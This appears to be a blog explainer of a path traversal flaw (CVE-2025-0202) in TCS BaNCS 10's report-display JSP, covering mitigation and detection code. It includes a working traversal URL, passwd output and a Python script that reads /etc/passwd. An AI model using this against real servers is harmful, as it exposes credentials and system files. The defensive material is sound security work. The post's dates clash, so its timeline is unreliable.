CVE-2025-0202 - File Inclusion in TCS BaNCS 10’s /REPORTS/REPORTS_SHOW_FILE.jsp – Explained and Exploited
If you’re working in banking, you might have heard of TCS BaNCS, a widely used banking software suite from Tata Consultancy Services. In June 2025, a new vulnerability, CVE-2025-0202, was found in TCS BaNCS 10. The flaw affects a core file, /REPORTS/REPORTS_SHOW_FILE.jsp, and is classified as “problematic”, but in the real world it can be quite dangerous.
Let’s break down what CVE-2025-0202 is, how it happens, how it could be exploited, and how you can protect your bank or company.
What is CVE-2025-0202?
CVEs (Common Vulnerabilities and Exposures) are identifiers for publicly known cybersecurity flaws. Here’s how this one plays out:
- Software: TCS BaNCS 10
- File Affected: /REPORTS/REPORTS_SHOW_FILE.jsp
- Vulnerability Type: File Inclusion (Directory Traversal, Local File Inclusion)
Basically, attackers can make the application read and return files that it shouldn’t, simply by manipulating the FilePath parameter in a web request.
Original reference:
- MITRE CVE-2025-0202 page *(Link placeholder for when published)*
Here’s a simplified version of what might happen in the JSP code:

```jsp
<%@ page import="java.io.FileInputStream" %>
<%
// Vulnerable pattern: the FilePath parameter is used as-is to open a file
String filePath = request.getParameter("FilePath");
FileInputStream fis = new FileInputStream(filePath);
int c;
// Stream the file's bytes straight into the HTTP response
while ((c = fis.read()) != -1) {
    out.write(c);
}
fis.close();
%>
```
- It opens this file from the server’s file system and directly returns its contents.
- There’s no security check to make sure the file is safe to open: no input validation or filtering.
Step 1: Attacker’s Goal
Let’s say you’re an attacker and want to read the sensitive /etc/passwd file (on Linux) or C:\Windows\win.ini (on Windows).
Step 2: The Request
You send a GET request to:
https://bank.example.com/REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=../../../../../../etc/passwd
The ../../ part keeps moving up to the server’s root directory until it reaches /etc/passwd.
Step 3: Server Response
If the server user account has read permissions for the target file, it will respond with the full contents of the file.
Example output (partial):

```text
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```
Here’s a simple Python script that automates the attack:

```python
import requests

base_url = 'https://bank.example.com/REPORTS/REPORTS_SHOW_FILE.jsp'
payload = '../../../../../../etc/passwd'  # Change for Windows targets
params = {'FilePath': payload}
# Request the file through the unvalidated FilePath parameter
r = requests.get(base_url, params=params, verify=False)
if r.status_code == 200 and 'root:' in r.text:
    print('Vulnerable! /etc/passwd contents:')
    print(r.text)
else:
    print('Not vulnerable or file not found.')
```
Note: This is for educational use only. Always have permission!
- Read sensitive files: Configuration files, credentials, secret keys, and more.
- Chain with other exploits: Sometimes, attackers might discover or leak application source code or log files, which could reveal more flaws.
- Deposit malware: If the attacker finds writable paths, they could escalate to code execution.
Remember: Simply restricting the input directory is NOT enough if users can still use ../ sequences!
Here’s what developers and sysadmins should do:
1. Input Validation: Always sanitize and validate user inputs. Allow only whitelisted paths or files.
2. Patch: Update TCS BaNCS as soon as the vendor releases a fix.
3. Least Privilege: Make sure the web server runs with restricted permissions, so even if there’s a file read, damage is minimized.
4. Monitor and Alert: Monitor access to sensitive files and unexpected requests to /REPORTS/REPORTS_SHOW_FILE.jsp.
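For the monitoring point, here is an added example (not from the original post and not TCS BaNCS code) that scans web server access log lines for requests to REPORTS_SHOW_FILE.jsp whose FilePath value contains traversal sequences, an absolute path, or a NUL byte, after percent-decoding twice so double-encoded variants are caught as well. The combined log format, the IP addresses and the log lines are constructed for illustration.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/*
 * Added example, not part of the original post or of TCS BaNCS. Flags access
 * log lines that request REPORTS_SHOW_FILE.jsp with a FilePath value that
 * looks like traversal or an absolute path. Apache/Tomcat combined log
 * format is assumed; all sample lines below are constructed.
 */
public class ReportsShowFileDetector {

    // Request target inside the quoted request line of a combined-format log.
    private static final Pattern REQUEST_TARGET =
        Pattern.compile("\"(?:GET|POST|HEAD) (\\S+) HTTP/[0-9.]+\"");
    // The FilePath query parameter (case-insensitive to be generous in detection).
    private static final Pattern FILE_PATH_PARAM =
        Pattern.compile("(?i)[?&]FilePath=([^&\\s]*)");
    // Windows drive-letter absolute path such as C:\Windows\win.ini
    private static final Pattern WINDOWS_ABSOLUTE = Pattern.compile("(?i)^[a-z]:[\\\\/].*");

    /** Percent-decodes up to twice so double-encoded ../ is normalised too. */
    static String decode(String raw) {
        String value = raw;
        for (int i = 0; i < 2; i++) {
            try {
                String decoded = URLDecoder.decode(value, StandardCharsets.UTF_8);
                if (decoded.equals(value)) {
                    break; // nothing left to decode
                }
                value = decoded;
            } catch (IllegalArgumentException e) {
                break; // malformed % sequence: keep what we have so far
            }
        }
        return value;
    }

    /** True when the line requests REPORTS_SHOW_FILE.jsp with a FilePath that escapes a directory. */
    public static boolean isSuspicious(String logLine) {
        Matcher req = REQUEST_TARGET.matcher(logLine);
        if (!req.find()) {
            return false;
        }
        String target = req.group(1);
        if (!target.toUpperCase().contains("/REPORTS/REPORTS_SHOW_FILE.JSP")) {
            return false;
        }
        Matcher param = FILE_PATH_PARAM.matcher(target);
        if (!param.find()) {
            return false;
        }
        String filePath = decode(param.group(1));
        return filePath.contains("..")
            || filePath.startsWith("/")
            || filePath.contains("\\")
            || WINDOWS_ABSOLUTE.matcher(filePath).matches()
            || filePath.indexOf('\0') >= 0;
    }

    /** Returns the subset of lines that should raise an alert. */
    public static List<String> flag(List<String> lines) {
        List<String> hits = new ArrayList<>();
        for (String line : lines) {
            if (isSuspicious(line)) {
                hits.add(line);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        // Constructed sample log: line 1 and line 5 are benign, lines 2-4 should be flagged.
        List<String> sample = List.of(
            "10.0.0.5 - - [12/Jun/2025:10:22:03 +0000] \"GET /REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=daily_summary.pdf HTTP/1.1\" 200 5120",
            "10.0.0.9 - - [12/Jun/2025:10:22:41 +0000] \"GET /REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=../../../../../../etc/passwd HTTP/1.1\" 200 2048",
            "10.0.0.9 - - [12/Jun/2025:10:22:42 +0000] \"GET /REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1\" 200 2048",
            "10.0.0.9 - - [12/Jun/2025:10:22:43 +0000] \"GET /REPORTS/REPORTS_SHOW_FILE.jsp?FilePath=%252e%252e%252fetc%252fpasswd HTTP/1.1\" 404 310",
            "10.0.0.3 - - [12/Jun/2025:10:23:00 +0000] \"GET /index.jsp HTTP/1.1\" 200 980"
        );
        for (String hit : flag(sample)) {
            System.out.println("ALERT: " + hit);
        }
    }
}
```

The check deliberately works on the decoded value rather than on raw bytes, because the same traversal can be written as `../`, `..%2F` or `%252e%252e%252f`; feeding the flagged lines to a SIEM rule keyed on the source IP gives the “unexpected requests” alert the list item asks for.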
Example of input validation (in Java):

```java
String filePath = request.getParameter("FilePath");
// Canonicalize before comparing: a prefix check on the raw string lets
// "/var/reports/../../etc/passwd" through, which is exactly the ../ problem above.
String canonical = (filePath == null) ? "" : new java.io.File(filePath).getCanonicalPath();
if (!canonical.startsWith("/var/reports/")) {
    response.sendError(HttpServletResponse.SC_FORBIDDEN, "Access denied.");
    return;
}
// Open 'canonical' (never the raw 'filePath') from here on
```
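A more complete version of the same check, as an added example that is not from the original post or from TCS BaNCS: the user value is treated as a name relative to a fixed report directory (assumed here to be /var/reports), absolute paths and invalid characters are rejected, ../ segments are collapsed before the containment test, and a second gate follows symlinks right before the file is opened. The class, method and sample input names are assumptions for illustration.

```java
import java.io.IOException;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.Paths;

/*
 * Added example, not TCS BaNCS code. Resolves the FilePath parameter against
 * a fixed report directory and refuses anything that escapes it. The base
 * directory /var/reports and the sample inputs are assumptions.
 */
public class ReportPathGuard {

    // Assumed location of the legitimate report files.
    static final Path BASE_DIR = Paths.get("/var/reports").toAbsolutePath().normalize();

    /**
     * Lexical check: returns the resolved path if userInput stays inside
     * baseDir, or null if the request must be rejected. Runs before any
     * file access, so it needs no file to exist.
     */
    public static Path resolveReportPath(Path baseDir, String userInput) {
        if (userInput == null || userInput.isEmpty()) {
            return null;
        }
        Path requested;
        try {
            requested = Paths.get(userInput);
        } catch (InvalidPathException e) {
            return null; // e.g. an embedded NUL byte on Unix
        }
        // An absolute path would ignore baseDir entirely.
        if (requested.isAbsolute()) {
            return null;
        }
        // Join to the base directory and collapse "." and ".." segments.
        Path resolved = baseDir.resolve(requested).normalize();
        // Path.startsWith compares whole components, so "/var/reports-old"
        // does not pass as a child of "/var/reports".
        if (!resolved.startsWith(baseDir)) {
            return null;
        }
        return resolved;
    }

    /**
     * Second gate, used just before opening the file: follows symlinks and
     * re-checks containment, so a link inside the report directory cannot
     * point back out of it.
     */
    public static Path realPathInside(Path baseDir, Path resolved) throws IOException {
        Path real = resolved.toRealPath();
        if (!real.startsWith(baseDir.toRealPath())) {
            throw new IOException("Resolved file escapes the report directory");
        }
        return real;
    }

    public static void main(String[] args) {
        // Constructed inputs: the first two are legitimate report names, the
        // rest model the traversal shapes discussed in the post.
        String[] samples = {
            "daily_summary.pdf",
            "2025/06/statement.csv",
            "../../../../../../etc/passwd",
            "/etc/passwd",
            "2025/../../../etc/passwd",
            "..",
        };
        for (String s : samples) {
            Path p = resolveReportPath(BASE_DIR, s);
            System.out.printf("%-32s -> %s%n", s, (p == null) ? "REJECTED" : p);
        }
    }
}
```

With these inputs only the first two names resolve (to /var/reports/daily_summary.pdf and /var/reports/2025/06/statement.csv); every other sample normalizes to a path outside /var/reports and is rejected before any file is touched. Note that Paths.get("/etc/passwd").isAbsolute() is false on Windows, so on a Windows deployment the containment check after normalize is what actually stops that input.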
References and Further Reading
- Official CVE-2025-0202 entry (MITRE)
- OWASP Directory Traversal Cheat Sheet
- OWASP Local File Inclusion (LFI)
Conclusion
CVE-2025-0202 is a clear example of how simple mistakes, like not validating file paths, can lead to serious breaches. If you run TCS BaNCS 10 or any similar financial platform, make it a priority to audit file-displaying code and patch fast.
Stay secure, and always keep an eye on the CVE feeds for vulnerabilities in your critical software!
Timeline
Published on: 01/04/2025 05:15:07 UTC